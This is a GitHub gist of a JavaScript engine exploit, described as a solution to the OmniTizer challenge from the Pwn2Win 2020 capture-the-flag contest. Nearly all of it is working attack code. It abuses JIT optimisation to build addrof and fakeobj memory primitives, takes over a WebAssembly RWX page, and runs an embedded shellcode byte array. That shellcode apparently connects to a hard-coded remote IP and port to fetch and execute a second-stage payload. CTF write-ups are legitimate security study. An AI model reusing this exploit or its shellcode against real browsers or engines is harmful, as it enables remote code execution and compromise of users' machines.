-
-
Save YiChenChai/fdfadb9288a5c7aa8b21eb463898fd2c to your computer and use it in GitHub Desktop.
Exploit for OmniTizer challenge from Pwn2Win 2020
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function r(i) { | |
i[0]; | |
i[1]; | |
i[2]; | |
i[3]; | |
return i[0]; | |
} | |
function w(i, v) { | |
i[0]; | |
i[1]; | |
i[2]; | |
i[3]; | |
i[0] = v; | |
} | |
function dr(i) { | |
i.a; | |
i.b; | |
i.c; | |
i.d; | |
return i.b; | |
} | |
for (var j = 0; j < 1000000; j++) {r([1.1,1.1,1.1,1.1,1.1]);} | |
for (var j = 0; j < 1000000; j++) {w([1.1,1.1,1.1,1.1,1.1], 2.2);} | |
for (var j = 0; j < 1000000; j++) {dr({a: 1.1, b: 1.1, c: 1.1, d: 1.1});} | |
function f2h(f, off) { | |
var buf = new DataView(new ArrayBuffer(8)); | |
buf.setFloat64(0, f); | |
return buf.getUint32(off); | |
} | |
function h2f(h, l) { | |
var buf = new DataView(new ArrayBuffer(8)); | |
buf.setUint32(4, h); | |
buf.setUint32(0, l); | |
return buf.getFloat64(0); | |
} | |
function addrof(obj) { | |
var raw = r([obj, [], [], [], []]); | |
//console.log(raw); | |
return f2h(raw, 4); | |
} | |
function fakeobj(addr) { | |
var store = [[], [], [], [], []]; | |
var raw = w(store, h2f(addr, 0)); | |
return store[0]; | |
} | |
function deref(obj, off) { | |
var raw = dr({a: 1.1, b: obj}); | |
return f2h(raw, off); | |
} | |
function nextpart(f) { | |
var rwxloc = addrof(m) + 0x68; | |
// %DebugPrint(m); | |
sub = 0; | |
if ((rwxloc - loc) % 8 != 0) {sub = 4;} | |
var rwxidx = (rwxloc - loc - sub) / 8; | |
var var1 = f[rwxidx]; | |
var var2 = f[rwxidx + 1]; | |
var res = var1; | |
console.log(rwxidx); | |
if (sub != 0) { | |
resl = f2h(var1, 0); | |
resh = f2h(var2, 4); | |
res = h2f(resl, resh); | |
console.log("special"); | |
console.log(resl.toString(16)); | |
console.log(resh.toString(16)); | |
console.log(res); | |
} | |
return [res, addrof(m.exports.main)]; | |
} | |
var wasmCode = new Uint8Array([0x0,0x61,0x73,0x6d,0x1,0x0,0x0,0x0,0x1,0x85,0x80,0x80,0x80,0x0,0x1,0x60,0x0,0x1,0x7f,0x3,0x83,0x80,0x80,0x80,0x0,0x2,0x0,0x0,0x4,0x84,0x80,0x80,0x80,0x0,0x1,0x70,0x0,0x0,0x5,0x83,0x80,0x80,0x80,0x0,0x1,0x0,0x1,0x6,0x81,0x80,0x80,0x80,0x0,0x0,0x7,0x9d,0x80,0x80,0x80,0x0,0x3,0x6,0x6d,0x65,0x6d,0x6f,0x72,0x79,0x2,0x0,0x9,0x5f,0x5a,0x35,0x68,0x61,0x70,0x70,0x79,0x76,0x0,0x0,0x4,0x6d,0x61,0x69,0x6e,0x0,0x1,0xa,0x93,0x80,0x80,0x80,0x0,0x2,0x84,0x80,0x80,0x80,0x0,0x0,0x41,0x2b,0xb,0x84,0x80,0x80,0x80,0x0,0x0,0x41,0x2a,0xb]); | |
var wasmMod = new WebAssembly.Module(wasmCode); | |
var m = new WebAssembly.Instance(wasmMod); | |
console.log(m); | |
console.log(fakearr_data); | |
var fakearr_data = [h2f(0x08241909, 0x080406e9), 0.1, 0.2]; | |
var loc = deref(fakearr_data, 0) | |
console.log(loc.toString(16)); | |
fakearr_data[1] = h2f(loc + 0x18, 0x80000); | |
fakearr_data[2] = h2f(0x08040a3d, 0x80000); | |
var fakearr = fakeobj(deref(fakearr_data, 0) + 8); | |
loc += 0x20; | |
var arrbuf = new ArrayBuffer(0x1000); | |
var dv = new DataView(arrbuf); | |
var arrbuf_loc = addrof(arrbuf); | |
console.log(arrbuf_loc); | |
console.log(loc); | |
var beginidx = (arrbuf_loc + 0x20 - loc - 8 -4) / 8; | |
var backing = fakearr[beginidx]; | |
console.log(fakearr[beginidx]); | |
var res = nextpart(fakearr); | |
var rwxpage = res[0]; | |
var fff = fakeobj(res[1]); | |
console.log(rwxpage); | |
// %DebugPrint(arrbuf); | |
var shellcode = [ 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33, 0x32, 0x00, 0x00, 0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5, 0x49, 0xbc, 0x02, 0x00, 0x11, 0x52, 0x80, 0xc7, 0xd1, 0x0e, 0x41, 0x54, 0x49, 0x89, 0xe4, 0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68, 0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a, 0x41, 0x5e, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0x49, 0xff, 0xce, 0x75, 0xe5, 0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9, 0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41, 0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, 0xf2, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31, 0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40, 0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5, 0x57, 0x59, 0x41, 0xba, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c, 0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48, 0x85, 0xf6, 0x75, 0xb4, 0x41, 0xff, 0xe7, 0x58, 0x6a, 0x00, 0x59, 0x49, 0xc7, 0xc2, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5]; | |
fakearr[beginidx] = rwxpage; | |
console.log(dv.getUint32(0).toString(16)); | |
for (var i = 0; i < shellcode.length; i++) { | |
dv.setUint8(i, shellcode[i]); | |
} | |
// readline();; | |
fff(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment